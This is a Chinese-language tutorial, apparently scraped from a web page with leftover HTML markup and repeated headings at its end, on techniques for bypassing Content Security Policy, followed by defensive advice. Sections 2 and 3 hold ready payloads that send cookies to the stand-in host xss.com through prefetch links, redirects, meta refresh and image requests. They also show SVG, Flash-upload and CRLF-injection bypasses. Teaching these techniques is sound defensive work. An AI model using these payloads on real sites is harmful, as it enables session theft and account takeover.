CSP Bypass 技术细节与防御方法<\/h1>

1. CSP 简介与浏览器支持情况<\/h2>
内容安全策略 (Content Security Policy, CSP) 是一种用于防范 XSS 攻击的安全机制，通过定义哪些资源可以被加载和执行来增强网页安全性。<\/p>

1.1 浏览器支持情况<\/h3>

Firefox<\/strong>: 对 CSP 的支持最为完善，能够较好地实现 CSP 规范<\/li>

Chrome<\/strong>: 支持相对迟缓，历史上存在一些问题：

Chrome 45 及之前版本默认禁止 inline 脚本执行，即使设置 'unsafe-inline'<\/code> 也无效<\/li>
现代版本已逐步完善 CSP 支持，'unsafe-inline'<\/code> 可以正常使用<\/li> <\/ul> <\/li> <\/ul> 2. unsafe-inline<\/code> 模式下的 Bypass 方法<\/h2> 当 CSP 策略设置为允许内联脚本时 (script-src 'self' 'unsafe-inline'<\/code>)，存在多种绕过方法：<\/p> 2.1 利用 <link><\/code> 标签的 rel 属性<\/h3> Firefox 浏览器<\/h4> <link<\/span> rel<\/span>=<\/span>"dns-prefetch"<\/span> href<\/span>=<\/span>"[cookie].xss.com"<\/span>> <\/span><\/span><\/code><\/pre> 利用 dns-prefetch<\/code> 属性发送 DNS 查询泄露数据<\/li> 该属性尚未被加入 CSP 实现中<\/li> <\/ul> Chrome 浏览器<\/h4> <link<\/span> rel<\/span>=<\/span>"prefetch"<\/span> href<\/span>=<\/span>"http:\/\/www.xss.com\/x.php?c=[cookie]"<\/span>> <\/span><\/span><\/code><\/pre> 使用 prefetch<\/code> 属性通过 GET 请求泄露 cookie<\/li> 可通过 JavaScript 动态创建元素实现<\/li> <\/ul> 2.2 通用绕过方法<\/h3> 页面跳转<\/h4> <<\/span>script<\/span>><\/span> <\/span><\/span>window.location<\/span>=<\/span>"http:\/\/www.xss.com\/x.php?c="<\/span>+<\/span>escape<\/span>(document.cookie<\/span>); <\/span><\/span><<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre> CSP 通常不会限制 location.href<\/code> 跳转<\/li> 可结合跳转回原页面减少被发现的可能性<\/li> <\/ul> 动态创建元素跳转<\/h4> var<\/span> a<\/span>=<\/span>document.createElement<\/span>("a"<\/span>); <\/span><\/span>a<\/span>.href<\/span>=<\/span>'http:\/\/www.xss.com\/?c='<\/span>+<\/span>escape<\/span>(document.cookie<\/span>); <\/span><\/span>a<\/span>.click<\/span>(); <\/span><\/span><\/code><\/pre><meta><\/code> 标签跳转<\/h4> <meta<\/span> http-equiv<\/span>=<\/span>"refresh"<\/span> content<\/span>=<\/span>"5;url=http:\/\/www.xss.com\/?c=[cookie]"<\/span>> <\/span><\/span><\/code><\/pre>图片外链泄露<\/h4> var<\/span> i<\/span>=<\/span>document.createElement<\/span>("img"<\/span>); <\/span><\/span>i<\/span>.src<\/span>=<\/span>'http:\/\/www.xss.com\/?c='<\/span>+<\/span>escape<\/span>(document.cookie<\/span>); <\/span><\/span>document.body<\/span>.appendChild<\/span>(i<\/span>); <\/span><\/span><\/code><\/pre> 适用于 img-src *<\/code> 策略的网站<\/li> <\/ul> 3. 严格 CSP 策略下的 Bypass 方法 (script-src 'self'<\/code>)<\/h2> 3.1 重定向 (302) 绕过<\/h3> 当 CSP 限制脚本只能从特定目录加载时：<\/p> <script<\/span> src<\/span>=<\/span>"http:\/\/127.0.0.1\/a\/redirect.php?url=\/b\/2.js"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre> 通过同域下的 302 跳转可以加载其他目录下的脚本<\/li> 限制：不能跨域跳转加载脚本<\/li> <\/ul> 3.2 文件上传功能绕过<\/h3> 3.2.1 利用 MIME 类型<\/h4> Apache<\/strong>: 未定义后缀的文件不返回 Content-Type，会被当作 HTML 解析<\/p> <\/span> <\/span><\/span><\/code><\/pre><\/li> Nginx<\/strong>: 上传 SVG 文件<\/p> <svg<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span> onload=<\/span>"alert(URL)"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre> SVG 文件会被正确解析并执行内联 JavaScript<\/li> <\/ul> <\/li> <\/ul> 3.2.2 加载伪装为 Flash 的文件<\/h4> <embed<\/span> src<\/span>=<\/span>"http:\/\/127.0.0.1\/upload\/1.jpg"<\/span> type<\/span>=<\/span>"application\/x-shockwave-flash"<\/span>><\/embed<\/span>> <\/span><\/span><\/code><\/pre> 将恶意 JavaScript 编译为 ActionScript 并保存为 .jpg<\/li> Firefox 会忽略服务器返回的 MIME 类型，按照指定 type 加载<\/li> <\/ul> 3.3 CRLF 注入绕过<\/h3> 通过注入换行符将 CSP 头部挤到 HTTP body 中：<\/p> Location: url\r\n\r\n<script>alert(1)<\/script> <\/code><\/pre> 适用于非 PHP 环境（PHP 高版本已禁止多行 header）<\/li> 使 JavaScript 完全不受 CSP 限制<\/li> <\/ul> 4. 其他注意事项<\/h2> 4.1 <link rel="import"><\/code> 的限制<\/h3> 加载的文档被视为内联脚本，受发起页 CSP 限制<\/li> 相比 iframe 限制更多，不推荐用于 CSP 绕过<\/li> <\/ul> 5. 防御建议<\/h2> 避免使用 unsafe-inline<\/code><\/strong>：内联脚本风险高，尽量使用外部脚本<\/li> 严格限制资源加载<\/strong>：避免使用通配符 (*<\/code>)，明确指定可信来源<\/li> 文件上传安全<\/strong>：严格验证文件内容和类型<\/li> 设置正确的 MIME 类型<\/li> 将上传文件存储在独立域名下<\/li> <\/ul> <\/li> 重定向安全<\/strong>：验证重定向目标，避免开放重定向<\/li> CRLF 防护<\/strong>：过滤用户输入中的特殊字符<\/li> <\/ol> 6. 结论<\/h2> CSP 作为 XSS 防护机制仍存在多种绕过方法，特别是在 unsafe-inline<\/code> 模式下风险较高。开发者应结合 CSP 与其他安全措施（如输入输出过滤、HTTP 头安全设置等）构建纵深防御体系。同时，随着浏览器对 CSP 支持的不断完善，新的绕过方法也会不断出现，需要持续关注安全更新。<\/p>

CSP Bypass 技术细节与防御方法<\/h1>

1. CSP 简介与浏览器支持情况<\/h2> 内容安全策略 (Content Security Policy, CSP) 是一种用于防范 XSS 攻击的安全机制，通过定义哪些资源可以被加载和执行来增强网页安全性。<\/p>

2.2 通用绕过方法<\/h3>

3.2 文件上传功能绕过<\/h3>

4. 其他注意事项<\/h2>

1. CSP 简介与浏览器支持情况<\/h2>
内容安全策略 (Content Security Policy, CSP) 是一种用于防范 XSS 攻击的安全机制，通过定义哪些资源可以被加载和执行来增强网页安全性。<\/p>